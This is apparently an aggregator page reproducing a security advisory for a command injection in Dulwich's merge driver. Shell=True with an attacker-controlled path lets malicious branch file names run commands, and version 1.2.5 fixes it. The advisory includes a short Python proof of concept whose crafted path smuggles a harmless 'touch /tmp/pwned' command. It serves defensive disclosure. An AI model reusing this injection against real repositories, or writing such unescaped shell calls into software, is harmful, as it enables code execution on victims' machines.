Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-9277-mp7x-85jf

Опубликовано: 28 мая 2026
Источник: github
Github: Прошло ревью
CVSS4: 7.7

Описание

Dulwich Vulnerable to Command Injection via Merge Driver Path

Summary

Dulwich's ProcessMergeDriver substitutes the file path (from the git tree, controllable by an attacker via a malicious branch) into the merge driver command via the %P placeholder and executes it with subprocess.run(..., shell=True). An attacker who can cause a victim to merge an untrusted branch can achieve arbitrary command execution by crafting malicious file paths.

Description

  • Type: Command Injection
  • Source: merge.py line 195 — path from merge tree (from repository content when merging untrusted branch)
  • Sink: merge_drivers.py lines 124–127 — subprocess.run(cmd, shell=True) where cmd includes path via %P placeholder
  • Impact: Arbitrary code execution when merging from a malicious repository. Requires the user to have a merge driver configured that uses the %P placeholder.

Resources

Proof of Concept

from dulwich.attrs import GitAttributes, Pattern from dulwich.config import ConfigDict from dulwich.merge import merge_blobs from dulwich.objects import Blob # Merge driver with %P (path) - typical for custom merge tools config = ConfigDict() config.set((b"merge", b"injectable"), b"driver", b"echo %P > %A") patterns = [(Pattern(b"*"), {b"merge": b"injectable"})] gitattributes = GitAttributes(patterns) base = Blob.from_string(b"base") ours = Blob.from_string(b"ours") theirs = Blob.from_string(b"theirs") # Malicious path from attacker-controlled git tree: injects "touch /tmp/pwned" malicious_path = b"x; touch /tmp/pwned #" merge_blobs(base, ours, theirs, path=malicious_path, gitattributes=gitattributes, config=config) # => Executes: echo x; touch /tmp/pwned # # => Shell runs: echo x, then touch /tmp/pwned

Fix

merge_drivers_shell_escape.patch

Пакеты

Наименование

dulwich

pip
Затронутые версииВерсия исправления

>= 0.24.0, < 1.2.5

1.2.5

EPSS

Процентиль: 43%
0.00555
Низкий

7.7 High

CVSS4

Дефекты

CWE-78

Связанные уязвимости

ubuntu
2 месяца назад

Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, Dulwich's `ProcessMergeDriver` substitutes the file path (from the git tree, controllable by an attacker via a malicious branch) into the merge driver command via the `%P` placeholder and executes it with `subprocess.run(..., shell=True)`. An attacker who can cause a victim to merge an untrusted branch can achieve arbitrary command execution by crafting malicious file paths. Version 1.2.5 fixes the issue.

nvd
2 месяца назад

Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, Dulwich's `ProcessMergeDriver` substitutes the file path (from the git tree, controllable by an attacker via a malicious branch) into the merge driver command via the `%P` placeholder and executes it with `subprocess.run(..., shell=True)`. An attacker who can cause a victim to merge an untrusted branch can achieve arbitrary command execution by crafting malicious file paths. Version 1.2.5 fixes the issue.

debian
2 месяца назад

Dulwich is a pure-Python implementation of the Git file formats and pr ...

CVSS3: 9.8
fstec
2 месяца назад

Уязвимость библиотеки Python для работы с репозиториями Git Dulwich, связанная с непринятием мер по нейтрализации специальных элементов, используемых в команде операционной системы, позволяющая нарушителю выполнить произвольные команды

EPSS

Процентиль: 43%
0.00555
Низкий

7.7 High

CVSS4

Дефекты

CWE-78